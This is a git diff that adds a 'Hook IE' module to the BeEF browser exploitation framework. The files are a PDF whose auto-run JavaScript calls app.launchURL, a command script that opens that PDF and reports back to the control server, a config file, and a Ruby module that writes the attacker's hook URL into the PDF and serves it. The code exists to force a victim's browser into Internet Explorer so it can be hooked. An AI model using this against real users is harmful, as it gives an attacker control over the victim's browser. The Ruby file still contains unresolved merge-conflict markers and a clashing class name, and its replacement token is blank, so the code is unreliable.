diff --git a/modules/browser/hook_ie/bounce_to_ie.pdf b/modules/browser/hook_ie/bounce_to_ie.pdf new file mode 100755 index 000000000..f0230f9a8 --- /dev/null +++ b/modules/browser/hook_ie/bounce_to_ie.pdf @@ -0,0 +1,79 @@ +%PDF-1.1 +1 0 obj +<< + /Pages 3 0 R + /OpenAction 4 0 R + /Type /Catalog +>> +endobj +2 0 obj +<< + /Encoding /MacRomanEncoding + /Subtype /Type1 + /BaseFont /Helvetica + /Type /Font + /Name /F1 +>> +endobj +3 0 obj +<< + /Kids [ 5 0 R ] + /Type /Pages + /Count 1 +>> +endobj +4 0 obj +<< + /S /JavaScript + /JS 6 0 R +>> +endobj +5 0 obj +<< + /MediaBox [ 0 0 795 842 ] + /Contents 7 0 R + /Parent 3 0 R + /Resources << + /Font << + /F1 2 0 R + >> + /ProcSet [ /PDF /Text ] + >> + /Type /Page +>> +endobj +6 0 obj +<< + /Length 1708 +>>stream +app.launchURL("",true); +endstream +endobj +7 0 obj +<< + /Length 48 +>>stream +BT + +ET +endstream +endobj +xref +0 8 +0000000000 65535 f +0000000010 00000 n +0000000087 00000 n +0000000209 00000 n +0000000278 00000 n +0000000332 00000 n +0000000513 00000 n +0000002278 00000 n +trailer +<< + /Size 8 + /ID [ (11f570958af49b794c95ff1c6be3bac5) (11f570958af49b794c95ff1c6be3bac5) ] + /Root 1 0 R +>> +startxref +2381 +%%EOF diff --git a/modules/browser/hook_ie/command.js b/modules/browser/hook_ie/command.js new file mode 100644 index 000000000..dbae263f2 --- /dev/null +++ b/modules/browser/hook_ie/command.js @@ -0,0 +1,22 @@ +// +// Copyright 2011 Wade Alcorn wade@bindshell.net +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +beef.execute(function() { + + var pdf_url = '/report.pdf'; + window.open( pdf_url, '_blank'); + + beef.net.send('<%= @command_url %>', <%= @command_id %>, "Attempted to open PDF in default browser."); +}); diff --git a/modules/browser/hook_ie/config.yaml b/modules/browser/hook_ie/config.yaml new file mode 100644 index 000000000..42e357ded --- /dev/null +++ b/modules/browser/hook_ie/config.yaml @@ -0,0 +1,25 @@ +# +# Copyright 2011 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +beef: + module: + hook_ie: + enable: true + category: "Browser" + name: "Hook IE" + description: "This module will attempt to hook IE if it is the default browser." + authors: ["saafan"] + target: + user_notify: ["FF", "O"] diff --git a/modules/browser/hook_ie/module.rb b/modules/browser/hook_ie/module.rb new file mode 100644 index 000000000..c2317af7f --- /dev/null +++ b/modules/browser/hook_ie/module.rb @@ -0,0 +1,78 @@ +<<<<<<< .mine +class Hook_ie < BeEF::Core::Command +======= +# +# Copyright 2011 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +class Detect_details < BeEF::Core::Command +>>>>>>> .r1087 + + def initialize + super({ + 'Name' => 'Hook IE', + 'Description' => %Q{ + This module will attempt to hook IE if it is the default browser.' + }, + 'Category' => 'Browser', + 'Author' => ['saafan'], + 'File' => __FILE__ + }) + + #Get the servers configurations. + configuration = BeEF::Core::Configuration.instance + + #The hook url to be replace the token in the original pdf file. + hook_uri = "http://#{configuration.get("beef.http.dns")}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.demo_path")}" + + # A new pdf file containg the actual hook URI instead of the dummy token. + configured_hook_file = File.open("./modules/browser/hook_ie/bounce_to_ie_configured.pdf","w") + + # The original pdf file contains a token that will get replaced during the initialization with + # the actual hook URI of beef. Note that the hook URI is accessed via the DNS name. + File.open('./modules/browser/hook_ie/bounce_to_ie.pdf',"r") { |original_hook_file| + original_hook_file.each_line { |line| + # If the line includes the hook token, then replace it with the actual hook URI + if(line.include? '') + line = line.sub(//, hook_uri) + end + #write the line to a new file + configured_hook_file.write(line) + } + } + + configured_hook_file.close() + + + #Bind the configured PDF file to the web server. + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/hook_ie/bounce_to_ie_configured.pdf', '/report', 'pdf', -1); + + set_target({ + 'verified_status' => VERIFIED_WORKING, + 'browser_name' => ALL + }) + + use 'beef.dom' + use_template! + end + + def callback + content = {} + content['result'] = @datastore['result'] + + save content + #update_zombie! + end + +end \ No newline at end of file